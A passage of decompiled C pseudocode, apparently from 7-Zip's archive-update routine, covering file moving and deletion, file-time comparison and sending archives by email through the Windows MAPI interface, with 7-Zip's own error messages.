																																					 *(_t1900 - 4) = 0x15;
																																					L00B41A7C(_t1470, _t1900 - 0xa8);
																																					 *(_t1900 - 4) = 0x14;
																																					E00B40309(_t1470, _t1900 - 0x44);
																																					 *(_t1900 - 4) = 0x13;
																																					E00B40252(_t1900 - 0x9c);
																																					E00B20C00(_t1900 - 0xb4);
																																					 *(_t1900 - 4) = 0xd;
																																					E00B30DCE(_t1900 - 0x29c);
																																					 *(_t1900 - 4) = 6;
																																					E00B3086E(_t1900 - 0x24c);
																																					E00B20C00(_t1900 - 0x58);
																																					 *(_t1900 - 4) =  *(_t1900 - 4) | 0xffffffff;
																																					L00B319B4(_t1900 - 0x1ac);
																																					_t984 = 0;
																																					__eflags = 0;
																																					goto L271;
																																				}
																																				 *(_t1900 - 0x64) = _t1886;
																																				 *(_t1900 - 0x60) = _t1886;
																																				 *(_t1900 - 0x5c) = _t1886;
																																				 *(_t1900 - 4) = 0x50;
																																				E00B56896(_t1900 - 0x28);
																																				__eflags =  *(_t1900 - 0x224) - _t1886;
																																				 *(_t1900 - 4) = 0x51;
																																				 *(_t1900 + 0x20) = _t1886;
																																				if( *(_t1900 - 0x224) <= _t1886) {
																																					L259:
																																					E00B267BD(_t1900 - 0x64);
																																					_t1470 = 0;
																																					_t1044 = E00B3CEB2(_t1900 - 0x64);
																																					__eflags = _t1044;
																																					if(_t1044 <= 0) {
																																						L264:
																																						_t1849 =  *((intOrPtr*)( *( *(_t1900 + 0x1c)) + 0x58))();
																																						 *(_t1900 - 4) = 0x50;
																																						__eflags = _t1849 - _t1886;
																																						_t1528 = _t1900 - 0x28;
																																						if(_t1849 == _t1886) {
																																							L00B41B84(_t1470, _t1528);
																																							 *(_t1900 - 4) = 0x20;
																																							E00B20C00(_t1900 - 0x64);
																																							goto L270;
																																						}
																																						L265:
																																						L00B41B84(_t1470, _t1528);
																																						 *(_t1900 - 4) = 0x20;
																																						E00B20C00(_t1900 - 0x64);
																																						 *(_t1900 - 4) = 0x1f;
																																						L00B41A29(_t1900 - 0x8c);
																																						 *(_t1900 - 4) = 0x1c;
																																						E00B20C00(_t1900 - 0x4c);
																																						 *(_t1900 - 4) = 0x15;
																																						L00B41A7C(_t1470, _t1900 - 0xa8);
																																						 *(_t1900 - 4) = 0x14;
																																						E00B40309(_t1470, _t1900 - 0x44);
																																						 *(_t1900 - 4) = 0x13;
																																						E00B40252(_t1900 - 0x9c);
																																						E00B20C00(_t1900 - 0xb4);
																																						 *(_t1900 - 4) = 0xd;
																																						E00B30DCE(_t1900 - 0x29c);
																																						 *(_t1900 - 4) = 6;
																																						E00B3086E(_t1900 - 0x24c);
																																						E00B20C00(_t1900 - 0x58);
																																						goto L266;
																																					} else {
																																						goto L260;
																																					}
																																					do {
																																						L260:
																																						L00B2EF0D(_t1900 - 0x24c, _t1900 - 0x80,  *((intOrPtr*)(L00B63AA4(_t1900 - 0x64, _t1470) + 4)));
																																						 *(_t1900 - 4) = 0x54;
																																						_t1064 = E00B4023C(E00B40239(_t1900 - 0x80), __eflags);
																																						__eflags = _t1064;
																																						if(_t1064 == 0) {
																																							goto L263;
																																						}
																																						_t1849 =  *((intOrPtr*)( *( *(_t1900 + 0x1c)) + 0x54))(_t1900 - 0x80, 1);
																																						_t1547 = _t1900 - 0x80;
																																						__eflags = _t1849 - _t1886;
																																						if(_t1849 != _t1886) {
																																							L268:
																																							E00B20C00(_t1547);
																																							 *(_t1900 - 4) = 0x50;
																																							_t1528 = _t1900 - 0x28;
																																							goto L265;
																																						}
																																						L00B1584C(E00B40239(_t1547));
																																						L263:
																																						 *(_t1900 - 4) = 0x51;
																																						E00B20C00(_t1900 - 0x80);
																																						_t1470 = _t1470 + 1;
																																						_t1066 = E00B3CEB2(_t1900 - 0x64);
																																						__eflags = _t1470 - _t1066;
																																					} while (_t1470 < _t1066);
																																					goto L264;
																																				} else {
																																					goto L241;
																																				}
																																				do {
																																					L241:
																																					_t1852 =  *((intOrPtr*)( *((intOrPtr*)(_t1900 - 0x228)) +  *(_t1900 + 0x20) * 4));
																																					L00B2EF0D(_t1900 - 0x24c, _t1900 - 0x38,  *(_t1900 + 0x20));
																																					 *(_t1900 - 4) = 0x52;
																																					_t1076 =  *(_t1852 + 0x20) >> 4;
																																					__eflags = _t1076 & 0x00000001;
																																					if((_t1076 & 0x00000001) == 0) {
																																						_t1077 =  *(_t1900 - 0x4c);
																																						_t1551 =  *(_t1900 + 0x20);
																																						__eflags =  *((char*)(_t1551 + _t1077));
																																						if( *((char*)(_t1551 + _t1077)) == 0) {
																																							goto L258;
																																						}
																																						E00B16529(_t1900 - 0xfc);
																																						_t1081 = E00B12D90(_t1900 - 0xd4);
																																						__eflags =  *((char*)(_t1470 + 0x11));
																																						 *(_t1900 - 4) = 0x53;
																																						_push(_t1081 & 0xffffff00 |  *((char*)(_t1470 + 0x11)) == 0x00000000);
																																						_push( *(_t1900 - 0x38));
																																						_t1083 = E00B169AB(_t1900 - 0xfc);
																																						__eflags = _t1083;
																																						if(_t1083 == 0) {
																																							L257:
																																							 *(_t1900 - 4) = 0x52;
																																							L00B15DAB(_t1900 - 0xfc);
																																							goto L258;
																																						}
																																						__eflags =  *((char*)(_t1470 + 0x11));
																																						if( *((char*)(_t1470 + 0x11)) == 0) {
																																							L249:
																																							__eflags =  *(_t1900 - 0xfc) -  *_t1852;
																																							if( *(_t1900 - 0xfc) !=  *_t1852) {
																																								L251:
																																								_t1086 = 0;
																																								__eflags = 0;
																																								L252:
																																								__eflags = _t1086;
																																								if(_t1086 == 0) {
																																									goto L257;
																																								}
																																								L253:
																																								_t899 = _t1852 + 0x18; // 0x18
																																								_t1089 = CompareFileTime(_t1900 - 0xe4, _t899);
																																								__eflags = _t1089;
																																								if(_t1089 != 0) {
																																									goto L257;
																																								}
																																								_t1091 = CompareFileTime(_t1900 - 0xf4, _t1852 + 8);
																																								__eflags = _t1091;
																																								if(_t1091 != 0) {
																																									goto L257;
																																								}
																																								_t1849 =  *((intOrPtr*)( *( *(_t1900 + 0x1c)) + 0x54))(_t1900 - 0x38, _t1886);
																																								__eflags = _t1849 - _t1886;
																																								if(__eflags != 0) {
																																									 *(_t1900 - 4) = 0x52;
																																									L00B15DAB(_t1900 - 0xfc);
																																									_t1547 = _t1900 - 0x38;
																																									goto L268;
																																								}
																																								L00B15DB5(E00B40239(_t1900 - 0x38), __eflags);
																																								goto L257;
																																							}
																																							__eflags =  *((intOrPtr*)(_t1900 - 0xf8)) -  *((intOrPtr*)(_t1852 + 4));
																																							if( *((intOrPtr*)(_t1900 - 0xf8)) ==  *((intOrPtr*)(_t1852 + 4))) {
																																								goto L253;
																																							}
																																							goto L251;
																																						}
																																						__eflags =  *((intOrPtr*)(_t1852 + 0x38)) - _t1886;
																																						if( *((intOrPtr*)(_t1852 + 0x38)) != _t1886) {
																																							L248:
																																							_t1086 = E00B40243(_t1900 - 0xfc);
																																							goto L252;
																																						}
																																						__eflags =  *((intOrPtr*)(_t1852 + 0x40)) - _t1886;
																																						if( *((intOrPtr*)(_t1852 + 0x40)) == _t1886) {
																																							goto L249;
																																						}
																																						goto L248;
																																					}
																																					 *(_t1900 - 0x6c) =  *(_t1900 + 0x20);
																																					L00B2641A(_t1900 - 0x70,  *(_t1900 - 0x38));
																																					E00B56B77(_t1900 - 0x64);
																																					_t1101 =  *(_t1900 - 0x60);
																																					 *(_t1900 - 0x60) =  *(_t1900 - 0x60) + 1;
																																					 *( *(_t1900 - 0x64) + _t1101 * 8) =  *(_t1900 - 0x70);
																																					 *( *(_t1900 - 0x64) + 4 + _t1101 * 8) =  *(_t1900 - 0x6c);
																																					_t1886 = 0;
																																					L258:
																																					 *(_t1900 - 4) = 0x51;
																																					E00B20C00(_t1900 - 0x38);
																																					 *(_t1900 + 0x20) =  &( *(_t1900 + 0x20)->i);
																																					__eflags =  *(_t1900 + 0x20) -  *(_t1900 - 0x224);
																																				} while ( *(_t1900 + 0x20) <  *(_t1900 - 0x224));
																																				goto L259;
																																			}
																																			 *(_t1900 + 0x20) = _t1886;
																																			 *(_t1900 - 4) = 0x34;
																																			_t1102 = L00B154CC(_t1900 + 0x20, __eflags, L"Mapi32.dll");
																																			__eflags = _t1102;
																																			if(_t1102 != 0) {
																																				E00B56896(_t1900 - 0x74);
																																				_t1855 = 0;
																																				__eflags =  *(_t1470 + 0x5c) - _t1886;
																																				 *(_t1900 - 4) = 0x37;
																																				if(__eflags <= 0) {
																																					L206:
																																					_t1104 = GetProcAddress( *(_t1900 + 0x20), "MAPISendMailW");
																																					__eflags = _t1104 - _t1886;
																																					 *(_t1900 + 0xc) = _t1104;
																																					if(_t1104 == _t1886) {
																																						_t1105 = GetProcAddress( *(_t1900 + 0x20), "MAPISendMail");
																																						__eflags = _t1105 - _t1886;
																																						 *(_t1900 + 0xc) = _t1105;
																																						if(_t1105 != _t1886) {
																																							E00B12D90(_t1900 - 0x13c);
																																							 *(_t1900 - 4) = 0x46;
																																							 *((char*)(_t1900 - 0x130)) = 1;
																																							E00B1606B(_t1900 - 0x13c);
																																							 *(_t1900 - 4) = 0x47;
																																							E00B56896(_t1900 - 0x38);
																																							 *(_t1900 - 4) = 0x48;
																																							E00B56896(_t1900 - 0xc4);
																																							_t1888 = 0;
																																							 *(_t1900 - 4) = 0x49;
																																							__eflags =  *(_t1900 - 0x70);
																																							if(__eflags <= 0) {
																																								L231:
																																								_t1857 = 0;
																																								 *(_t1900 - 0x1c) = 0;
																																								 *(_t1900 - 0x18) = 0;
																																								 *((intOrPtr*)(_t1900 - 0x14)) = 0;
																																								_t1889 =  *(_t1900 - 0x34);
																																								 *(_t1900 - 4) = 0x4e;
																																								L00B41D28(_t1900 - 0x1c, _t1889);
																																								__eflags =  *(_t1900 - 0x34);
																																								 *(_t1900 - 0x18) = _t1889;
																																								if( *(_t1900 - 0x34) <= 0) {
																																									L235:
																																									memset(_t1900 - 0xf4, _t1857, 0x30);
																																									 *(_t1900 - 0xcc) =  *(_t1900 - 0x18);
																																									 *(_t1900 - 0xc8) =  *(_t1900 - 0x1c);
																																									E00B20BAA();
																																									__eflags =  *(_t1900 - 0x24) - _t1857;
																																									 *(_t1900 - 4) = 0x4f;
																																									if( *(_t1900 - 0x24) != _t1857) {
																																										memset(_t1900 - 0x12c, _t1857, 0x18);
																																										 *(_t1900 - 0x120) =  *(_t1900 - 0x28);
																																										_t1127 = 1;
																																										 *((intOrPtr*)(_t1900 - 0x128)) = _t1127;
																																										 *((intOrPtr*)(_t1900 - 0xd4)) = _t1127;
																																										 *((intOrPtr*)(_t1900 - 0xd0)) = _t1900 - 0x12c;
																																									}
																																									E00B11E89(E00B11E89( *(_t1900 + 0xc)(_t1857, _t1857, _t1900 - 0xf4, 8, _t1857),  *(_t1900 - 0x28)),  *(_t1900 - 0x1c));
																																									 *(_t1900 - 4) = 0x48;
																																									L00B41B84(_t1470, _t1900 - 0xc4);
																																									 *(_t1900 - 4) = 0x47;
																																									L00B41B84(_t1470, _t1900 - 0x38);
																																									 *(_t1900 - 4) = 0x37;
																																									_t1578 = _t1900 - 0x13c;
																																									L238:
																																									E00B40282(_t1578);
																																									 *(_t1900 - 4) = 0x34;
																																									L00B41B84(_t1470, _t1900 - 0x74);
																																									L00B154AD(_t1900 + 0x20);
																																									_t1886 = 0;
																																									__eflags = 0;
																																									goto L239;
																																								}
																																								 *(_t1900 + 0x14) = 0;
																																								do {
																																									_t1890 =  *(_t1900 + 0x14) +  *(_t1900 - 0x1c);
																																									memset(_t1890, 0, 0x18);
																																									 *(_t1890 + 8) =  *(_t1890 + 8) | 0xffffffff;
																																									 *(_t1900 + 0x14) =  &(( *(_t1900 + 0x14))[6]);
																																									_t1903 = _t1903 + 0xc;
																																									 *((intOrPtr*)(_t1890 + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)( *(_t1900 - 0x38) + _t1857 * 4))));
																																									_t1135 =  *((intOrPtr*)( *((intOrPtr*)(_t1900 - 0xc4)) + _t1857 * 4));
																																									_t1857 = _t1857 + 1;
																																									 *((intOrPtr*)(_t1890 + 0x10)) =  *_t1135;
																																									__eflags = _t1857 -  *(_t1900 - 0x34);
																																								} while (_t1857 <  *(_t1900 - 0x34));
																																								_t1857 = 0;
																																								__eflags = 0;
																																								goto L235;
																																							} else {
																																								goto L230;
																																							}
																																							do {
																																								L230:
																																								E00B12EA8(_t1900 - 0x28, __eflags,  *((intOrPtr*)( *((intOrPtr*)(_t1900 - 0x74)) + _t1888 * 4)));
																																								 *(_t1900 - 4) = 0x4a;
																																								E00B144D2(_t1900 - 0x28);
																																								 *(_t1900 - 4) = 0x4b;
																																								_t1140 = E00B20BAA();
																																								 *(_t1900 - 4) = 0x4c;
																																								E00B56B33(_t1900 - 0x38);
																																								_push(_t1140);
																																								_t1142 = L00B41CDA(_t1900 - 0x38);
																																								 *(_t1900 - 4) = 0x4b;
																																								E00B11E89(_t1142,  *(_t1900 - 0x64));
																																								_t1144 = E00B20BAA();
																																								 *(_t1900 - 4) = 0x4d;
																																								E00B56B33(_t1900 - 0xc4);
																																								_push(_t1144);
																																								_t1148 = E00B11E89(E00B11E89(L00B41CDA(_t1900 - 0xc4),  *(_t1900 - 0x120)),  *(_t1900 - 0x80));
																																								 *(_t1900 - 4) = 0x49;
																																								E00B11E89(_t1148,  *(_t1900 - 0x28));
																																								_t1903 = _t1903 + 0xc;
																																								_t1888 = _t1888 + 1;
																																								__eflags = _t1888 -  *(_t1900 - 0x70);
																																							} while (__eflags < 0);
																																							goto L231;
																																						}
																																						_t1860 =  *(_t1900 + 0x14);
																																						E00B3E08A(_t1860, "7-Zip cannot find MAPISendMail function");
																																						_t1151 =  *_t1860;
																																						__eflags = _t1151 - _t1886;
																																						if(__eflags != 0) {
																																							if(__eflags > 0) {
																																								_t1151 = _t1151 & 0x0000ffff | 0x80070000;
																																								__eflags = _t1151;
																																							}
																																							_t1891 = _t1151;
																																						} else {
																																							_t1891 = 0x80004005;
																																						}
																																						 *(_t1900 - 4) = 0x34;
																																						L00B41B84(_t1470, _t1900 - 0x74);
																																						L00B154AD(_t1900 + 0x20);
																																						 *(_t1900 - 4) = 0x1f;
																																						E00B11E89(L00B41B0E(_t1900 - 0x8c),  *(_t1900 - 0x4c));
																																						 *(_t1900 - 4) = 0x15;
																																						L00B41A7C(_t1470, _t1900 - 0xa8);
																																						 *(_t1900 - 4) = 0x44;
																																						E00B3E068(_t1900 - 0x44);
																																						 *(_t1900 - 4) = 0x14;
																																						L00B41B84(_t1470, _t1900 - 0x44);
																																						 *(_t1900 - 4) = 0x45;
																																						L227:
																																						E00B11E89(E00B11E89(E00B16505(_t1900 - 0x9c),  *((intOrPtr*)(_t1900 - 0x98))),  *((intOrPtr*)(_t1900 - 0xb4)));
																																						 *(_t1900 - 4) = 0xd;
																																						E00B30DCE(_t1900 - 0x29c);
																																						 *(_t1900 - 4) = 6;
																																						E00B11E89(E00B3086E(_t1900 - 0x24c),  *(_t1900 - 0x58));
																																						_t753 = _t1900 - 4;
																																						 *_t753 =  *(_t1900 - 4) | 0xffffffff;
																																						__eflags =  *_t753;
																																						L00B319B4(_t1900 - 0x1ac);
																																						L228:
																																						_t984 = _t1891;
																																						goto L271;
																																					}
																																					E00B12D90(_t1900 - 0x124);
																																					 *(_t1900 - 4) = 0x3c;
																																					 *(_t1900 - 0x118) = 1;
																																					E00B1606B(_t1900 - 0x124);
																																					 *(_t1900 - 4) = 0x3d;
																																					E00B56896(_t1900 - 0x1c);
																																					 *(_t1900 - 4) = 0x3e;
																																					E00B56896(_t1900 - 0x80);
																																					_t1861 = 0;
																																					__eflags =  *(_t1900 - 0x70) - _t1886;
																																					 *(_t1900 - 4) = 0x3f;
																																					if(__eflags <= 0) {
																																						L209:
																																						 *(_t1900 - 0x64) = _t1886;
																																						 *(_t1900 - 0x60) = _t1886;
																																						 *(_t1900 - 0x5c) = _t1886;
																																						_t1862 =  *(_t1900 - 0x18);
																																						 *(_t1900 - 4) = 0x42;
																																						L00B41C78(_t1900 - 0x64, _t1862);
																																						 *(_t1900 - 0x60) = _t1862;
																																						_t1863 = 0;
																																						__eflags =  *(_t1900 - 0x18) - _t1886;
																																						if(__eflags <= 0) {
																																							L212:
																																							memset(_t1900 - 0xf4, 0, 0x30);
																																							 *(_t1900 - 0xcc) =  *(_t1900 - 0x60);
																																							 *(_t1900 - 0xc8) =  *(_t1900 - 0x64);
																																							E00B12EA8(_t1900 - 0x28, __eflags, _t1470 + 0xd4);
																																							__eflags =  *(_t1900 - 0x24);
																																							 *(_t1900 - 4) = 0x43;
																																							if( *(_t1900 - 0x24) != 0) {
																																								memset(_t1900 - 0x144, 0, 0x18);
																																								 *(_t1900 - 0x138) =  *(_t1900 - 0x28);
																																								_t1186 = 1;
																																								 *((intOrPtr*)(_t1900 - 0x140)) = _t1186;
																																								 *((intOrPtr*)(_t1900 - 0xd4)) = _t1186;
																																								 *((intOrPtr*)(_t1900 - 0xd0)) = _t1900 - 0x144;
																																							}
																																							E00B11E89(E00B11E89( *(_t1900 + 0xc)(0, 0, _t1900 - 0xf4, 8, 0),  *(_t1900 - 0x28)),  *(_t1900 - 0x64));
																																							 *(_t1900 - 4) = 0x3e;
																																							L00B41B84(_t1470, _t1900 - 0x80);
																																							 *(_t1900 - 4) = 0x3d;
																																							L00B41B84(_t1470, _t1900 - 0x1c);
																																							 *(_t1900 - 4) = 0x37;
																																							_t1578 = _t1900 - 0x124;
																																							goto L238;
																																						}
																																						 *(_t1900 + 0x14) = _t1886;
																																						do {
																																							_t1893 =  *(_t1900 + 0x14) +  *(_t1900 - 0x64);
																																							memset(_t1893, 0, 0x18);
																																							 *(_t1893 + 8) =  *(_t1893 + 8) | 0xffffffff;
																																							 *(_t1900 + 0x14) =  &(( *(_t1900 + 0x14))[6]);
																																							_t1903 = _t1903 + 0xc;
																																							 *((intOrPtr*)(_t1893 + 0xc)) =  *(( *(_t1900 - 0x1c))[_t1863]);
																																							_t1194 = ( *(_t1900 - 0x80))[_t1863];
																																							_t1863 = _t1863 + 1;
																																							 *((intOrPtr*)(_t1893 + 0x10)) =  *_t1194;
																																							__eflags = _t1863 -  *(_t1900 - 0x18);
																																						} while (__eflags < 0);
																																						goto L212;
																																					} else {
																																						goto L208;
																																					}
																																					do {
																																						L208:
																																						E00B12EA8(_t1900 - 0x28, __eflags,  *((intOrPtr*)( *((intOrPtr*)(_t1900 - 0x74)) + _t1861 * 4)));
																																						 *(_t1900 - 4) = 0x40;
																																						E00B144D2(_t1900 - 0x28);
																																						 *(_t1900 - 4) = 0x41;
																																						E00B56B33(_t1900 - 0x1c);
																																						_push(_t1900 - 0x28);
																																						E00B11524(_t1900 - 0x1c);
																																						E00B56B33(_t1900 - 0x80);
																																						_push(_t1900 - 0xc4);
																																						_t1205 = E00B11E89(E00B11524(_t1900 - 0x80),  *((intOrPtr*)(_t1900 - 0xc4)));
																																						 *(_t1900 - 4) = 0x3f;
																																						E00B11E89(_t1205,  *(_t1900 - 0x28));
																																						_t1861 = _t1861 + 1;
																																						__eflags = _t1861 -  *(_t1900 - 0x70);
																																					} while (__eflags < 0);
																																					goto L209;
																																				} else {
																																					goto L204;
																																				}
																																				while(1) {
																																					L204:
																																					_push(_t1900 - 0x1c);
																																					E00B3E1FE( *((intOrPtr*)( *((intOrPtr*)(_t1470 + 0x58)) + _t1855 * 4)) + 0xc, _t1833, __eflags);
																																					 *(_t1900 - 4) = 0x38;
																																					E00B12D90(_t1900 - 0x38);
																																					_t1833 = _t1900 - 0x38;
																																					 *(_t1900 - 4) = 0x39;
																																					__eflags = E00B16058( *(_t1900 - 0x1c), _t1900 - 0x38);
																																					if(__eflags == 0) {
																																						break;
																																					}
																																					E00B56B33(_t1900 - 0x74);
																																					_push(_t1900 - 0x38);
																																					_t1232 = E00B11E89(E00B11524(_t1900 - 0x74),  *(_t1900 - 0x38));
																																					 *(_t1900 - 4) = 0x37;
																																					E00B11E89(_t1232,  *(_t1900 - 0x1c));
																																					_t1855 = _t1855 + 1;
																																					__eflags = _t1855 -  *(_t1470 + 0x5c);
																																					if(__eflags < 0) {
																																						continue;
																																					}
																																					goto L206;
																																				}
																																				_push(_t1900 - 0x1c);
																																				_t1849 = E00B3E0A5( *(_t1900 + 0x14), _t1900, __eflags, "GetFullPathName error");
																																				E00B11E89(E00B11E89(_t1214,  *(_t1900 - 0x38)),  *(_t1900 - 0x1c));
																																				 *(_t1900 - 4) = 0x34;
																																				L00B41B84(_t1470, _t1900 - 0x74);
																																				L00B154AD(_t1900 + 0x20);
																																				 *(_t1900 - 4) = 0x1f;
																																				E00B11E89(L00B41B0E(_t1900 - 0x8c),  *(_t1900 - 0x4c));
																																				 *(_t1900 - 4) = 0x15;
																																				L00B41A7C(_t1470, _t1900 - 0xa8);
																																				 *(_t1900 - 4) = 0x3a;
																																				E00B3E068(_t1900 - 0x44);
																																				 *(_t1900 - 4) = 0x14;
																																				L00B41B84(_t1470, _t1900 - 0x44);
																																				 *(_t1900 - 4) = 0x3b;
																																				L216:
																																				E00B11E89(E00B11E89(E00B16505(_t1900 - 0x9c),  *((intOrPtr*)(_t1900 - 0x98))),  *((intOrPtr*)(_t1900 - 0xb4)));
																																				L217:
																																				 *(_t1900 - 4) = 0xd;
																																				E00B30DCE(_t1900 - 0x29c);
																																				 *(_t1900 - 4) = 6;
																																				_t1019 = E00B3086E(_t1900 - 0x24c);
																																				L218:
																																				E00B11E89(_t1019,  *(_t1900 - 0x58));
																																				goto L219;
																																			}
																																			_t1864 =  *(_t1900 + 0x14);
																																			E00B3E08A(_t1864, "cannot load Mapi32.dll");
																																			_t1235 =  *_t1864;
																																			__eflags = _t1235 - _t1886;
																																			if(__eflags != 0) {
																																				if(__eflags > 0) {
																																					_t1235 = _t1235 & 0x0000ffff | 0x80070000;
																																					__eflags = _t1235;
																																				}
																																				_t1891 = _t1235;
																																			} else {
																																				_t1891 = 0x80004005;
																																			}
																																			L00B154AD(_t1900 + 0x20);
																																			 *(_t1900 - 4) = 0x1f;
																																			E00B11E89(L00B41B0E(_t1900 - 0x8c),  *(_t1900 - 0x4c));
																																			 *(_t1900 - 4) = 0x15;
																																			L00B41A7C(_t1470, _t1900 - 0xa8);
																																			 *(_t1900 - 4) = 0x35;
																																			E00B3E068(_t1900 - 0x44);
																																			 *(_t1900 - 4) = 0x14;
																																			L00B41B84(_t1470, _t1900 - 0x44);
																																			 *(_t1900 - 4) = 0x36;
																																			goto L227;
																																		}
																																		_push(_t1900 - 0x38);
																																		 *(_t1900 - 4) = 0x2d;
																																		E00B3E2E0( *((intOrPtr*)( *((intOrPtr*)(_t1470 + 0x58)))) + 0xc, __eflags);
																																		__eflags =  *((char*)(_t1900 + 0x23));
																																		 *(_t1900 - 4) = 0x2e;
																																		if(__eflags == 0) {
																																			L187:
																																			_t1833 =  *(_t1900 - 0x58);
																																			__eflags = L00B158CE( *(_t1900 - 0x38),  *(_t1900 - 0x58));
																																			if(__eflags != 0) {
																																				E00B11E89(_t1247,  *(_t1900 - 0x38));
																																				 *(_t1900 - 4) = 0x20;
																																				goto L195;
																																			}
																																			_t1865 =  *(_t1900 + 0x14);
																																			_push(_t1900 - 0x38);
																																			E00B3E0A5(_t1865, _t1900, __eflags, "cannot move the file");
																																			_t1472 =  &(_t1865[4]);
																																			E00B56B33( &(_t1865[4]));
																																			_push(_t1900 - 0x58);
																																			E00B11524( &(_t1865[4]));
																																			_t1254 =  *_t1865;
																																			__eflags = _t1254 - _t1886;
																																			if(__eflags != 0) {
																																				if(__eflags > 0) {
																																					_t1254 = _t1254 & 0x0000ffff | 0x80070000;
																																					__eflags = _t1254;
																																				}
																																				_t1891 = _t1254;
																																			} else {
																																				_t1891 = 0x80004005;
																																			}
																																			E00B11E89(_t1254,  *(_t1900 - 0x38));
																																			 *(_t1900 - 4) = 0x1f;
																																			E00B11E89(L00B41B0E(_t1900 - 0x8c),  *(_t1900 - 0x4c));
																																			 *(_t1900 - 4) = 0x15;
																																			L00B41A7C(_t1472, _t1900 - 0xa8);
																																			 *(_t1900 - 4) = 0x31;
																																			E00B3E068(_t1900 - 0x44);
																																			 *(_t1900 - 4) = 0x14;
																																			L00B41B84(_t1472, _t1900 - 0x44);
																																			 *(_t1900 - 4) = 0x32;
																																			goto L227;
																																		}
																																		__eflags = L00B15DB5( *(_t1900 - 0x58), __eflags);
																																		if(__eflags != 0) {
																																			goto L187;
																																		}
																																		_push(_t1900 - 0x58);
																																		_t1891 = E00B3E0A5( *(_t1900 + 0x14), _t1900, __eflags, "cannot delete the file");
																																		E00B11E89(_t1264,  *(_t1900 - 0x38));
																																		 *(_t1900 - 4) = 0x1f;
																																		E00B11E89(L00B41B0E(_t1900 - 0x8c),  *(_t1900 - 0x4c));
																																		 *(_t1900 - 4) = 0x15;
																																		L00B41A7C(_t1470, _t1900 - 0xa8);
																																		 *(_t1900 - 4) = 0x2f;
																																		E00B3E068(_t1900 - 0x44);
																																		 *(_t1900 - 4) = 0x14;
																																		L00B41B84(_t1470, _t1900 - 0x44);
																																		 *(_t1900 - 4) = 0x30;
																																		goto L227;
																																	}
																																	 *(_t1900 - 4) = 0x1f;
																																	E00B11E89(L00B41B0E(_t1900 - 0x8c),  *(_t1900 - 0x4c));
																																	 *(_t1900 - 4) = 0x15;
																																	L00B41A7C(_t1470, _t1900 - 0xa8);
																																	 *(_t1900 - 4) = 0x2b;
																																	E00B3E068(_t1900 - 0x44);
																																	 *(_t1900 - 4) = 0x14;
																																	L00B41B84(_t1470, _t1900 - 0x44);
																																	 *(_t1900 - 4) = 0x2c;
																																	goto L216;
																																} else {
																																	goto L178;
																																}
																																do {
																																	L178:
																																	_t1277 =  *((intOrPtr*)( *((intOrPtr*)(_t1900 - 0x8c)) + _t1511 * 4));
																																	__eflags =  *((intOrPtr*)(_t1277 + 4)) - _t1886;
																																	if( *((intOrPtr*)(_t1277 + 4)) != _t1886) {
																																		_t1278 =  *_t1277;
																																		_t534 = _t1278 + 0x86;
																																		 *_t534 =  *(_t1278 + 0x86) & 0x00000000;
																																		__eflags =  *_t534;
																																	}
																																	_t1511 = _t1511 + 1;
																																	__eflags = _t1511 -  *((intOrPtr*)(_t1900 - 0x88));
																																} while (_t1511 <  *((intOrPtr*)(_t1900 - 0x88)));
																																goto L181;
																															}
																															_t1849 = L00B3BFF8(_t1900 - 0x1ac);
																															__eflags = _t1849 - _t1886;
																															if(__eflags == 0) {
																																E00B3C03B(_t1900 - 0x1ac, __eflags);
																																goto L177;
																															}
																															 *(_t1900 - 4) = 0x1f;
																															E00B11E89(L00B41B0E(_t1900 - 0x8c),  *(_t1900 - 0x4c));
																															 *(_t1900 - 4) = 0x15;
																															L00B41A7C(_t1470, _t1900 - 0xa8);
																															 *(_t1900 - 4) = 0x29;
																															E00B3E068(_t1900 - 0x44);
																															 *(_t1900 - 4) = 0x14;
																															L00B41B84(_t1470, _t1900 - 0x44);
																															 *(_t1900 - 4) = 0x2a;
																															goto L216;
																														} else {
																															goto L156;
																														}
																														do {
																															L156:
																															__eflags =  *((char*)(_t1900 + 0x23));
																															if( *((char*)(_t1900 + 0x23)) == 0) {
																																 *(_t1900 - 0xb8) = _t1886;
																															} else {
																																 *(_t1900 - 0xb8) =  *( *(_t1900 - 0x1ac) +  *(_t1900 - 0x1a8) * 4 - 4);
																															}
																															_t1866 =  *((intOrPtr*)( *((intOrPtr*)(_t1470 + 0x58)) +  *(_t1900 + 0xc) * 4));
																															E00B12D90(_t1900 - 0x1c);
																															__eflags =  *((char*)(_t1470 + 6));
																															 *(_t1900 - 4) = 0x21;
																															if(__eflags == 0) {
																																_t439 = _t1866 + 0xc; // 0xc
																																_push(_t1900 - 0x28);
																																_t1289 = E00B3E1FE(_t439, _t1833, __eflags);
																																 *(_t1900 - 4) = 0x22;
																																_t1290 = L00B12F78(_t1900 - 0x1c, _t1289);
																																 *(_t1900 - 4) = 0x21;
																																E00B11E89(_t1290,  *(_t1900 - 0x28));
																																__eflags =  *(_t1900 + 0xc) - _t1886;
																																if( *(_t1900 + 0xc) != _t1886) {
																																	L165:
																																	_t447 = _t1900 + 8;
																																	 *_t447 =  *(_t1900 + 8) & 0x00000000;
																																	__eflags =  *_t447;
																																	goto L166;
																																}
																																__eflags =  *_t1470;
																																if( *_t1470 == 0) {
																																	goto L165;
																																}
																																__eflags =  *((char*)(_t1900 + 0x23));
																																if( *((char*)(_t1900 + 0x23)) == 0) {
																																	goto L165;
																																}
																																 *(_t1900 + 8) = 1;
																																goto L166;
																															} else {
																																L00B13076(_t1900 - 0x1c, "stdout");
																																 *(_t1900 + 8) =  *((intOrPtr*)(_t1900 + 0x23));
																																L166:
																																_t1293 =  *((intOrPtr*)( *( *(_t1900 + 0x1c)) + 0x4c))( *(_t1900 - 0x1c),  *(_t1900 + 8));
																																__eflags = _t1293 - _t1886;
																																 *(_t1900 - 0x6c) = _t1293;
																																if(_t1293 != _t1886) {
																																	E00B11E89(_t1293,  *(_t1900 - 0x1c));
																																	 *(_t1900 - 4) = 0x1f;
																																	E00B11E89(L00B41B0E(_t1900 - 0x8c),  *(_t1900 - 0x4c));
																																	 *(_t1900 - 4) = 0x15;
																																	L00B41A7C(_t1470, _t1900 - 0xa8);
																																	 *(_t1900 - 4) = 0x23;
																																	E00B3E068(_t1900 - 0x44);
																																	 *(_t1900 - 4) = 0x14;
																																	L00B41B84(_t1470, _t1900 - 0x44);
																																	_t1849 =  *(_t1900 - 0x6c);
																																	 *(_t1900 - 4) = 0x24;
																																	goto L216;
																																}
																																_push(_t1900 - 0x124);
																																 *(_t1900 - 0x118) =  *(_t1900 - 0x118) & 0x00000000;
																																_push( *(_t1900 + 0x1c));
																																_push( *(_t1900 + 0x14));
																																asm("sbb eax, eax");
